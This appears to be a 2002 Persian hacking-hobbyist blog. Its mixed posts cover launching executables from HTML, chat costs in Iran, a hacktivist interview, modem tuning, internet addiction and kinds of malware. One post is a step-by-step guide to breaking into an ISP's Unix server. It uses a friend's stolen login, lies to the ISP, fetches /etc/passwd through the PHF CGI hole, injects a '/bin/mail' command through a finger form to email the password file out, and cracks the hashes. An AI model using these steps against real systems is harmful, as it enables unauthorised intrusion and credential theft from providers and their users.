.:. .:. HACK BOYS .:. .:.

 

چگونگي اجراي فايلهاي اجرايي از داخل صفحات Html
احتمالا شما هم تا حالا به اين مسئله برخورد كرده باشيد كه بخواهيد از داخل يك صفحه Html يك فايل EXE يا يك فايل اجرايي ديگر را اجرا كرده باشيد. بنده به اين مشكل زماني برخوردم كه خواستم از داخل يك فايل HTML كه بر روي CD ذخيره شده بود (برنامه مجموعه مقالات سومين كنفرانس بين المللي مديريت كيفيت) ، يك فايل ديگر را از روي همان CD اجرا كنم .

بنده در اين مورد با دو مسئله مواجه بودم :
اولا : فايل اجرايي مورد نظر را با زدن يك كليد (بر روي صفحه HTML ) اجرا كنم.
دوما : مسير اين فايل را پيدا كنم (چون هر كسي CD درايوش يه اسمي داره مثلا :F يا :E)
براي حل اين مشكل با كمي گشتن كدهاي جالبي پيدا كردم كه نه تنها ميتوانستند يك فايل اجرايي را ، اجرا كنند بلكه ميتوانستند كارهايي از قبيل باز كردن اپلتهاي Control Panel را هم انجام دهند.
بوسيله يكي از كدها ميتوانيد براي اجراي يك فايل با استفاده از يك آبجكت از نوع WScript.Shell ساخته و سپس براحتي از آن استفاده كنيد، به كد زير دقت كنيد.

Set WShell = ("WScript.Shell")
WShell.Run "PATH\Search.exe"
براي حل مشكل مسير هم بنده از دستور Document.URL براي گرفتن مسير صفحه جاري استفاده نمودم البته شايد راههاي خيلي بهتري هم باشد ولي با همين هم كارم راه افتاد.

Set WShell = ("WScript.Shell")
WShell.Run mid(document.URL,8,len(document.URL)-17) + "\search.exe"
در زير نمونه اي شبيه اين دستور كه با استفاده از يك آبجكت ديگر ، در يك صفحه Html بكار رفته ، ميتواند اپلتهاي كنترل پنل را فراخواني نمايد را آورده ايم كه شما ميتوانيد آنرا براحتي در صفحات ( و فرمهاي ) خود استفاده نماييد


+ احسان شیطون ; ۱٠:٤٦ ‎ب.ظ ; شنبه ۳٠ آذر ،۱۳۸۱
comment نظرات ()

باورتون ميشه

پنج ميليارد ريال هزينه Chat جوانان ايراني در سال

سالانه حدود پنج ميليارد ريال توسط جوانان ايراني براي chat هزينه مي شود . در تحقيقي که بر روي اين مساله انجام گرفت نتايجي به صورت زير بدست آمد که بعضي از اين اعداد و ارقام در نوع خود جالب توجه و قابل تامل است .
در اتاق هاي chat ايراني ( که در اين آمارگيري yahoo messenger مورد بررسي قرار گرفته است ) در شبانه روز بطور متوسط 200 نفر حضور دارند که اين تعداد افراد در هيچ اتاق ديگري مشاهده نمي شود.
با توجه به رشد کامپيوتر و اينترنت در کشورهاي مترقي و صنعتي و مقايسه تعداد افراد استفاده کننده از اينترنت در کشورهاي جهان با کشورمان ديده مي شود که رشد تعداد کاربران اينترنت در ايران بسيار پايين تر از سطح کشورهايي نظير ايالات متحده آلمان انگليس و ... بوده ولي تعداد ايرانياني که همواره در chat حضور دارند معمولا بيشترين تعداد افراد در کشورهاي جهان است . اين مقايسه نشانه رويکرد بي سابقه ايرانيان ( بخصوص جوانان ايراني ) به اين پديده جديد است .
حضور شبانه روزي تعداد زيادي از جوانان ايراني در chat مي تواند يک مساله قابل توجه براي کارشناسان اجتماعي در ريشه يابي اين تمايل در بين جوانان باشد .
اين مقاله در مورد ريشه هاي اقتصادي اين پديده بوده و بررسي نکات اجتماعي اين مساله موضوعي است که در تخصص محققان و تحليلگران اجتماعي مي باشد . در اين امارگيري مشاهده شد که بطور متوسط 200 کاربر بطور شبانه روزي در اين chat حضور دارند . با گفتگويي که با يک نمونه آماري در بين اين افراد انجام شد هزينه متوسط صرف شده براي دريافت اشتراک اينترنت مبلغي حدود 2500 ريال بدست امد يعني بطور متوسط اين افراد براي هر ساعت chat کردن معادل 2500 ريال پرداخت مي کنند .
از طرف ديگر اکثريت قريب به اتفاق chat کنندگان از طريق خط تلفن به اينترنت متصل شده و بنابراين حدود 600 ريال در ساعت براي استفاده از تلفن مي پردازند . پس در مجموع براي هر ساعت استفاده از chat هزينه تمام شده برابر با 3100 ريال خواهد بود .
با ضرب اين مقادير مي توان ديد که روزانه 14.880.000 ريال ماهانه 446.400.000 ريال و سالانه 5.356.800.000 ريال براي استفاده از chat توسط ايرانيان هزينه مي شود . مبلغي حدود پنج ميليارد ريال فقط براي کساني که از yahoo messenger استفاده مي کنند مي تواند مبلغ عمده اي به شمار آيد .
شايد در روزهاي اوليه رشد اينرنت پديده chat چندان جدي گرفته نمي شد اما امروزه يکي از پر طرفدارترين سرويس هاي اينترنت محسوب مي شود . اين تحقيق نشان مي دهد درصد استفاده ايرانيان ( و بخصوص جوانان ايراني ) از اين پديده نوين نسبت به ديگر کشورهاي جهان بسيار بالاتر است .
حتي با توجه به رشد بيشتر اينترنت در کشورهاي صنعتي جهان ديده مي شود که شمار ايرانياني که در chat هاي مختلف حضور دارند بيشتر از ديگر کشورهاست.
در اين تحقيق فقط يکي از chat ها يعنيyahoo messenger بررسي شد ولي سايتهاي chat ديگري وجود دارند که بسيار پرطرفدار بوده و حتي سايت هاي chat فارسي بسياري بر روي اينترنت وجود دارد که کاربران اين chat ها در اين تحقيق مورد محاسبه قرار نگرفته اند .
اگر مقامات چينی در صدد تهيه فهرستی از دشمنان خود در خارج از كشور باشند، نام يك روزنامه‌نگار و نماينده سابق سازمان ملل متحد در تورنتو در ابتدای اين فهرست قرار می‌گيرد.
عضو فعال دو گروه معروف هك كه با نام مستعار Oxblood Ruffin شناخته می‌شود، به ياری مخالفان دولت چين شتافته تا آنها بتوانند از بند كنترل شديد دولت بر اينترنت رها شوند و اين امر توسط نرم‌افزاری كه گروه هك او ساخته ميسر شده است.
Oxblood عضو گروه هك Cult of the dead cow است كه در اواسط دهه 1980 كار خود را آغاز كرد. او همچنين عضوی از گروه تازه تأسيس Hactivismo است كه تركيبی است از متخصصان كامپيوتر و فعالان حقوق بشر كه اخيراً نرم‌افزار Camera/shy را عرضه كرد، نرم‌افزاری كه با كاربران كمك می‌كند تا در اينترنت ناشناس بمانند.
اين گروه بر اين باور است كه سانسور اينترنت نقص حقوق شهروندان است و هيچ دولتی نمی‌تواند حقوق شهروندان خود را نقض كند. اين گروه اعلام كرده كه راه‌هايی را جست‌وجو می‌كند تا اين دولت‌ها را به چالش بكشد. در همين زمينه Oxbloodدر مصاحبه‌ای با Business Week نظرات خويش را در مورد گروه‌های هك و وضعيت سانسور در چين بيان كرده است كه با هم می‌خوانيم:

گروه Cult of the dead cow چه گروه است؟
دو گروه هكر وجود دارد يكی افراد مثل ما كه هميشه در صف مقدم هستند و جامعه آنها را می‌شناسند و دسته ديگر كه هيچ كس از آنها خبری ندارد. گروه CDC از سال 1984 فعاليت خود را آغاز كرد و از همان زمان در اينترنت حضور يافت و از 4 سال پيش نيز به عرضه نرم‌افزارهای خود پرداخت. اين گروه شامل 23 نفر در آمريكاست. به استثنای خودم كه در آمريكا زندگی نمی‌كنم. تمام اين هكرها هم باهوش و كاربلد هستند.
چه طور می‌شود در اين گروه عضو شد؟
عضويت در اين گروه بسيار سخت است. برای متقاضيان آسان‌تر است تا پياده به ماه بروند تا اين كه عضو CDC شوند.
چرا اين اسم عجيب و غريب هوی متال گونه برای گروه انتخاب شده است؟
در دهه 80 در ميان گروه‌های هك مرسوم بود كه نام‌هايی سنگين و شبيه گروه‌های متال برای خود انتخاب كنند. نام اكثر گروه‌های هك آمريكا از تگزاس سرچشمه می‌گيرد كه ماهم از اين امر مستثنی نيستيم. نام CDC نيز از يك واحد دام و كشتارگاه گرفته شده و اعضای مؤسس اولين ملاقات‌های خود را در چنين محيط‌هايی انجام داده‌اند.
Hactivismo چيست و چرا عليه دولت چين فعاليت می‌كند؟
اين گروه چند سال پيش تأسيس شد. هدف اوليه آن فعاليت برروی فناوری‌هايی بود كه در زمينه اينترنت به كمك فعالان حقوق بشر بيايد. ما در اين گروه نسبت به سانسور اينترنت، دسترسی آزاد به اينترنت و حفظ حريم شخصی حساس هستيم و سعی می‌كنيم هكرها را در اين مسائل فعال كنيم و به ياری آنها بشتابيم كه از ديد ما امری قانونی است.
دليلتان چيست؟
من 6 سال عضو CDC بودم. تمام اعضای اين گروه به طرز غير قابل باوری باهوش هستند، به نحوی كه برخی مواقع هوش و ذكاوت آنها مرا می‌ترساند. اما همان موقع اين سئوال برای من مطرح بود كه به غير از فعاليت‌های عادی و روزمره، آنها چه كاری ميكنند. آنچه كه من ديدم اين بود كه تكنولوژی موقعيت‌های بزرگی برای انجام كارهای مثبت ايجاد می‌كند. هكرها نسبتاً آدم‌های آزادمنشی هستند و به موضوعات آزادی و دموكراسی اهميت می‌دهند.
و چرا چين؟
در بسياری از دولت‌ها سانسور وجود دارد و چين يكی از بارزترين نمونه‌هاست. چين برای من هميشه به عنوان برجسته‌ترين دولت سانسور كننده اينترنت مطرح بوده است و در اين ميان من هيچ واكنشی را از كشورهای غربی نمی‌بينم. همه مطلع هستيم كه سانسور اينترنت وجود دارد اما هيچ كس كاری را انجام نمی‌دهد كه اين مسأله ما را واداشت تا خود دست به كار شويم.
آيا فكر نمی‌كنيد شركت‌های غربی تكنولوژی مورد نياز چين را تأمين می‌كنند؟
شركت‌های غربی تمام تكنولوژی مورد نياز چين را تأمين می‌كنند. آنها هر چيزی را كه طرف چينی می‌خواهد در اختيارش می‌گذارند بدون اين كه ملاحظه برخی مسائل اخلاقی را بكنند.
اما بسياری معتقدند كه اوضاع چين روبه بهبود است؟ شما تغييری را در چين مشاهده نمی‌كنيد؟
من فكر نمی‌كنم چين رويه جديدی را اتخاذ كرده باشد. چين همان چين است. تنها آنها بازی را به گونه‌ای ديگر انجام می‌دهند، آنها بازی جديدی را آغاز كردهاند ولی ما نبايد فريب بخوريم.
گروه شما نرم‌افزار Camera/shy را اخيراً عرضه كرد. اين نرم‌افزار چكار می‌كند؟
اين نرم‌افزار به گونه‌ای ارتباطات شما را به رمز در می‌آورد. اگر e-mail با متنی را داريد كه می‌خواهيد از ديد بقيه پنهان بماند می‌توانيد با استفاده از اين نرم‌افزار به هدف خود دست پيدا كنيد. به راحتی می‌توانيد هر نوع محتوايی را در تصوير ديجيتالی پنهان كنيد. مثلاً می‌توانيد در تصوير جيانگ زمين، عكس دالايی لاما را پنهان كنيد، بدون اين كه كسی متوجه شود و به آن پی‌ببرد.
.........
.........
متن كامل اين مقاله را ميتوانيد در سايت مجله كامپيوتر و ارتباطات بخوانيد
http://ccwmagazine.com/News/Public/CCW/Oxblood_CDC.asp
بهينه سازي سرعت مودم و حل مشكل قطع شدن آن

روي شروع كليك راست بكنيد و در قسمت جستجو فايل System.ini را جستجو كنيد سپس آن را باز كنيد و با زدن كليد Ctr+F و وارد كردن [Enh386] اين عبارت را پيدا كنيد و سطر زير را زير آن اضافه كنيد

ComXIrqYBuffer=1024

به جاي X شماره Com ي را كه مودم از آن استفاده مي‌كند وارد كنيد و به جاي Y شماره Irq يي كه مودم از آن استفاده مي‌كند. براي بدست آوردن اين اطلاعات مي‌توانيد از System Information يا Control Panel استفاده كنيد...
فايل را ذخيره كنيد و خارج شويد. در درست وارد كردن اطلاعات دقت كنيد.
حال Control Panel را باز كنيد و Modems را انتخاب كنيد صفحه اي كه نام مودم شما را دربر دارد باز خواهد شد روي كليد Properties كليك كنيد.
صفحه اي باز خواهد شد كه در قسمت اول (General) بخش Maximum Speed را روي بالاترين مقدار قرار مي‌دهيم در قسمت دوم (Connection) روي كليد Port Setting كليك مي كنيم در صفحه اي كه باز مي‌شود مطمئن شويد كه Use FIFO buffers تيك خورده باشد سپس Receive Buffer را به حداكثر ميزان خود افزايش دهيد، كليد Ok را بزنيد و خارج شويد.
حال به پنجره قبلي برگشته ايم اين بار كليد Advance را كليك مي‌كنيم در صفحه اي كه باز مي شود مطمئن شويد كه Use flow control تيك خورده باشد و نوع آن نيز روي Hardware باشد.
حال در قسمت Extra settings اين دستور را وارد كنيد S11=40 و كليد Ok را بزنيد.
به عنوان آخرين كار در Control Panel قسمت System را انتخاب كنيد سپس در قسمت Device Mananger ، Port(Com/LPT) را باز كنيد و روي Com ي كه مودم استفاده مي‌كند دوبار كليك كنيد تا صفحه Properties باز شوددوباره تنظيمات پورت را چك كنيد تا سرعت آن بالاترين مقدار باشد.

+ احسان شیطون ; ٤:٢٤ ‎ق.ظ ; چهارشنبه ٢٧ آذر ،۱۳۸۱
comment نظرات ()

 

چه كسي به كامپيوتر معتاد شده ؟آيا شما email هاي خود را 10 بار در روز چك مي كنيد؟ آيا ارتباط online را به ارتباط رو در رو ترجيح مي دهيد؟ آيا هنگامي كه از كامپيوتر خود دور هستيد نشانه هاي نياز و اشتياق شديد به كامپيوتر و اينترنت در شما ديده مي شود؟ آيا به منظور اينكه ساعات بيشتري را براي جستجو در اينترنت اختصاص دهيد، از فعاليت هاي خانوادگي، وظايف كاري و پروژه هاي تحصيلي خود غفلت مي كنيد.
اگر جواب شما به اين سؤالات مثبت است، احتمالاً به يك نوع بيماري مبتلا هستيد كه روان شناسان آن را " بيماري اعتياد به اينترنت " Internet Addiction Disorder يا (IAD) مي نامند.

بيماري اعتياد به اينترنت (IAD) يك اختلال فيزيولوژيكي – رواني است كه در ارتباط با تحمل و مقاومت فرد است. به اين معنا كه جستجوي بسيار زياد در اينترنت موجب بر انگيختن احساس خوشي در فرد مي شود. به هنگام دوري از اينترنت، علائم بيماري بخصوص نگراني، عصبانيت، اختلالات روحي رواني و قطع روابط اجتماعي در فرد مشاهده مي شود.
متخصصان بهداشت رواني معتقدند كه هر چقدر ارتباطات online افزايش مي يابد، اعتياد به اينترنت نيز بيشتر شايع مي شود.


شبكه جهاني اينترنت يك شبكه اطلاع رساني سريع با منابع بيشمار است، برخي افراد با استفاده نادرست و بيش از حد از اينترنت و غرق كردن خود در دنياي كامپيوتر و جدا شدن از دنياي واقعي، اين فوائد را به آسيب تبديل مي كنند. كاربرد نادرست از اينترنت مي تواند به فروپاشي زندگي خانوادگي و از دست دادن حرفه يا شغل منجر شود.

در مورد كاربرد نادرست اينترنت بخصوص در ميان كاربران آن، نظرات متفاوتي وجود دارد. برخي مي گويند اينترنت مي تواند اعتيادآور باشد تا آنجا كه موجب اختلال و بي نظمي در زندگي شود.
برخي ديگر بر اين باورند كه بيماري اعتياد به اينترنت نمي تواند به عنوان يك بيماري مطرح باشد زيرا احساس خوشي حاصل از كاربرد و جستجو در اينترنت همانند احساس خوشي حاصل از مصرف مواد مخدر يا ديگر مواد مخدر نيست.

به عقيده يكي از متخصصان، بيماري اعتياد به اينترنت از نظر پزشكي مانند اعتياد به الكل نيست، اما مي توان از آن به عنوان يك اختلال رفتاري خارج از كنترل نام برد كه زندگي عادي كاربران اينترنت را تهديد مي كند.

برخي افراد به بازيهاي online در اينترنت معتاد مي شوند، برخي ديگر در اتاقهاي chat گرفتار مي شوند و برخي ديگر بشدت مجذوب فايل هاي تصوير، موسيقي يا اطلاعات ديگر مي شوند.


بر گرفته از سايت ايران هو


--------------------------------------------------------------------------------تست زیر نشون میده که کی به کامپیوتر وابستگی داره یا به قول ما ایرونی ها معتاد کامپیوتر شده. هر کی که از خصلتهای زیر زیادتر داره درجه وابستگیش به کامپیوتر شدیدتره !

ترجمه من از سایت http://www.hshinterbruehl.ac.at

کسی به کامپیوتر معتاد شده که :- ساعت 4 صبح که میخواد بره دستشویی کامپیوترش رو هم روشن میکنه که ای میل هاش رو چک کرده باشه!

- به جای آدرس در یک فورم اداری آدرس ای میلشو بنویسه!

- خودش برای خودش ای میل بده که یک چیزی یادش بمونه!

- وقتی ای میهاشو کنترل میکنه و میبینه میل نداره دوباره ای میلهاشو کنترل کنه!

- وقتی نامه مینویسه بعد از نقطه ها com بنویسه!

- وقتی برای سگ توی خونش هم هومپیج درست کرده باشه!

- وقتی کامپیوترش رو خاموش کنه حس کنه کسی رو کشته!

-وقتی به پدر و مادرش دیگه نتونه دسترسی داشته باشه چون اونها اینترنتشون قطع شده!

- وقتی همسرش ازش با فریاد بخواد که با نوت بوک تو رختخواب نره!

- وقتی همسرش به علت کمبود رابطه قهر کنه و اون برای همسرش مودم بخره!

- وقتی که همیشه در زندگی روزمره دنبال کلید Back بگرده!

- و وقتی که با دوستاش شروع به شرط بندی کنه که هیچکس از اون سریعتر نمیتونه دوپل کلیک کنه!
+ احسان شیطون ; ٧:٢٤ ‎ق.ظ ; دوشنبه ٢٥ آذر ،۱۳۸۱
comment نظرات ()

 

Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و در مشهد خودمان هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي هكر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شكا يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad


در اينجا مثلا Tahaنام IDو 3a62...كلمهي عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكنمي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh

ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در نامه هاي قبلي توضيح داده شده .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد

FTP http://www.domain.com/

كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد

FTP ftp.domain.com

اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .

http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd

اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .

www.domain.com/cgi-bin/finger

اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .

ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd

كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .

bfh@internet.com ; /bin/mail taha_bazri@yahoo.com < etc/passwd

با وارد كردن اين دستور فايل Passwdبراي من به آدرس Taha_bazri@yahoo.com
پست مي شود !

خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونهي اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد .

+ احسان شیطون ; ٧:٢٢ ‎ق.ظ ; دوشنبه ٢٥ آذر ،۱۳۸۱
comment نظرات ()

 

سلام بچه ها میخواستم از دوستانمون احسان ازاد و سیامک تشکر کنم امروز خیلی حال داد تعدادی از دوساتن رو هم دیدم از جمله اقا احسان که ما شالله از احسان کم نیاوردیم هفت هشتا احسان داشتیم و بانوی اردیبهشت
نیما و پسر ایرونی حلو گربه های اشرافی 4تفنگدار ذبیح و بابا حمید و خانمهای انار و مریم 612 و ....
خلاصه خیلی ها بودن و خیلی خوش گذشت جای شما خالی

+ احسان شیطون ; ٤:٢٧ ‎ق.ظ ; جمعه ٢٢ آذر ،۱۳۸۱
comment نظرات ()

 

عريف برنامه‌هاي مخرب


نظر به وبلاگهای الوده که در پرشن وبلاگ وچود دارد وتقاضا ی دوستا ن مقاله ویروس رادوباره در وبلاگ قرار دادیم
هر برنامه‌اي كه موجب اختلال در روند جاري فعاليت‌هاي يك سيستم گردد، برنامه‌اي مخرب محسوب مي‌گردد.
انواع برنامه‌هاي مخرب
1- Logical Bombبمب منطقي
2- Macroماكروها
3-Trojan Horse اسب تروآ
4-Wormكرم
5- Virusويروس
چرا برنامه‌هاي مخرب توليد مي‌شوند؟
در اينجا دلايلي چند براي توليد برنامه‌هاي مخرب را مي‌آوريم:
1- جلوگيري از تكثير بي‌رويه و غيرقانوني نرم‌افزارها
افراد و يا شركتهاي برنامه‌نويس براي توليد انواع نرم‌افزارهاي خود هزينه‌هايي را صرف مي‌كنند كه از محل فروش آنها جبران مي‌گردد،‌ افراد بسياري در جهان وجود دارند كه تمايلي به پرداخت بهاي نرم‌افزار مورد نياز خود را ندارند در نتيجه درصدد استفاده غير مجاز از نرم‌افزار برمي‌آيند. بنابراين شركتهاي توليدكننده قفل‌هايي (Lock) را براي جلوگيري از تكثير بدون اجازه نرم‌افزار ايجاد مي‌كنند كه درصورت شكستن قفل برنامه، ويروس
يا ويروس‌هاي مخرب پنهان‌شده در برنامه اصلي فعال شده و اثرات تخريبي خود را بر روي سيستم كاربر غير‌مجاز اعمال مي‌كنند.
2- جلوگيري از استفاده دائم از نرم‌افزارهاي نمايشي (Demo)
شركتهاي توليدكننده نرم‌افزار نسخه‌اي از نرم‌افزار اصلي خود كه تمام امكانات برنامه اصلي را داشته ولي محدوديت زماني در استفاده از آن وجود دارد را بنام نسخه نمايشي (Demo Version) به‌طور رايگان در بازار عرضه مي‌كنند كه درصورت مورد پسندبودن برنامه از طرف كاربر،‌ برنامه اصلي كه محدوديت زماني ندارد را از شركت مربوطه با پرداخت بهاي آن، تهيه مي‌كنند.
قفل‌هايي كه براي جلوگيري از تكثير غير مجاز تهيه مي‌شوند هم به‌صورت سخت‌افزاري و هم نرم‌افزاري وجود دارند. ولي پيشرفته‌ترين و پيچيده‌ترين قفل‌ها نيز مطمئن نيستند، تنها مي‌توانند صرفه اقتصادي بازنمودن قفلها را كاهش دهند.
ولي افرادي به روش‌هايي اين محدوديت‌هاي زماني استفاده از نرم‌افزار را از بين مي‌برند و با بهاي كمتر نرم‌افزار را در بازار پخش مي‌كنند كه در اين حالت نيز توليد‌كنندگان نرم‌افزار از برنامه‌هاي مخربي كه در داخل برنامه اصلي پنهان است و درصورت باز شدن برنامه فعال شده و آسيب‌هايي را به كاربر غير مجاز مي‌زند، استفاده مي‌كنند.
3- كسب درآمد
اين امكان وجود دارد كه فرد يا شركت خاصي خود به توليد ويروس پرداخته و سپس آنرا به روش‌هاي گوناگون در ميان كاربران رايانه‌ رها مي‌سازد و پس از آلودگي كامل تعداد زيادي از سيستم‌ها و بروز اعمال تخريبي ويروس، توليدكننده اصلي ويروس تحت عناوين فريبنده (شركت ضد ويروس …) وارد ميدان شده و با دريافت هزينه‌هاي بسيار اقدام به از بين‌بردن ويروس مخرب كرده و از اين طريق درآمد بسياري كسب مي‌كند.
4- مقاصد فردي
اخراج فردي كه مسلط به برنامه‌نويسي مي‌باشد و غيرمنصفانه از كار خود بركنار مي‌شود، نتايج و عواقب بدي مي‌تواند داشته باشد. براي مثال ايشان مي‌تواند اقدام به نوشتن دستورالعملهاي مخرب در سيستم‌هاي آن مؤسسه كند و در نتيجه ضرر بسياري وارد ‌آورد.
5- مقاصد گروهي - شركتي
ممكن است شركتي براي ايجاد اختلال در فعاليتهاي يك شركت رقيب ويروسي نوشته و از طرق مختلف آنرا در شركت مربوطه شيوع دهد. در نتيجه فعاليت‌هاي شركت رقيب كُند و يا به كلي متوقف مي‌گردد.
6- مقاصد سياسي و جاسوسي
همين كار در ابعاد كشوري نيز مطرح مي‌باشد، كشوري بر عليه كشور دشمن با استفاده از ويروس و يا برنامه‌هاي مخرب ديگر آسيب زده و به اهداف خود مي‌رسد.
در جنگ خليج فارس كشور عراق براي اولين‌بار هواپيماي مخفي (استيلت) كه توسط رادارهاي معمولي قابل رهگيري نبود را توسط رادار فوق پيشرفته‌اي كه از فرانسه خريداري كرده بود و تا آن زمان كسي از قابليتهاي آن آگاه نبود بر عليه اين هواپيما استفاده كرد و آنرا سرنگون نمود.
آمريكا با فشارهاي سياسي و … بر كشور فرانسه تقاضاي از كار انداختن دستگاه رادار نصب شده در عراق را داشت كه در آخر فرانسوي‌ها از طريق ماهواره يك ويروس يا يك (بمب منطقي) پنهان شده در سيستمهاي كامپيوتري رادار را فعال كرده در نتيجه رادار از كار افتاده و ضربه سنگيني به دولت عراق وارد آمد.
7- علل رواني
همه دلايل توليد ويروسها اقتصادي و سياسي نمي‌باشد، بلكه ممكن است دلايل فرهنگي و اخلاقي و رواني نيز داشته باشد. براي مثال برنامه نويسي مي‌خواهد شهرت كسب كند و يا تبليغ افكار فردي خود را كند.
- آنچه مسلم است برنامه‌هاي مخرب به هر دليلي موجب نابودي اطلاعات گشته و در نتيجه شناخت صحيح از ساختار و عملكردهاي آنها براي كاربر لازم مي‌نمايد.
در اينجا به تعريف و شرح هر كدام از برنامه‌هاي مخرب در حد مختصر مي‌پردازيم.
بمب منطقي (Logical Bomb)
برنامه‌اي است كه تحت شرط يا شرايط خاصي تحريك شده و طبق خواسته نويسنده خود به سيستم جاري آسيب وارد مي‌كند.
برنامه بمب‌ منطقي معمولاً در داخل كدهاي پيچيده يك برنامه كاربردي مانند برنامه حسابداري و … پنهان مي‌شود. يك بمب منطقي اغلب توسط فردي كه به سيستم كامپيوتري آشنا بوده و با تغييردادن برنامه بمب منطقي را به برنامه اصلي اضافه مي‌كند و يا از ابتدا برنامه‌نويس درون برنامه اصلي خود كدهايي را قرار مي‌دهد كه در شرايط خاصي فعال شده و ضمن تحت كنترل گرفتن سيستم اعمال تخريبي خود را انجام مي‌دهد.
در نمودار صفحه بعد همانطوري‌كه مشاهده مي‌گردد برنامه بمب منطقي به برنامه اصلي اضافه شده است و زماني‌كه برنامه اصلي اجرا مي‌شود برنامه بمب منطقي بررسي مي‌كند كه آيا تاريخ 1 ژانويه مي‌باشد يا نه درصورت منفي‌بودن بررسي برنامه اصلي به كار خود ادامه مي‌دهد ولي اگر تاريخ اول ژانويه بود يعني نتيجه بررسي مثبت است درآنصورت بمب منطقي تحريك شده و پس از نمايش پيغامي، تمام فايل‌ها را پاك كرده و سپس ديسك را مجدداً فرمت مي‌كند.
ماكرو ها (Macro)
ماكرو در واقع محول‌كردن كارهايي بر عهده كليد و يا دستوري خاص مي‌باشد و در سيستم عامل Dos مي‌توان توسط فايل دسته‌اي Batch و يا Doskey ماكرو تعريف نمود و به‌جاي وظايف منطقي و صحيح وظايف مخرب و نابود‌كننده را خواست.
براي مثال در Ms-Word مي‌توان ماكرويي تعريف نمود كه با فشار كليد Alt+F ناگهان تمام متون تايپ شده را
حـذف كـند و يـا بجـاي كلمه‌اي خاص، كلمه‌اي نامربوط را جايگزين نمايد و در آخر وظيفه اصـلي خـود را يعـني
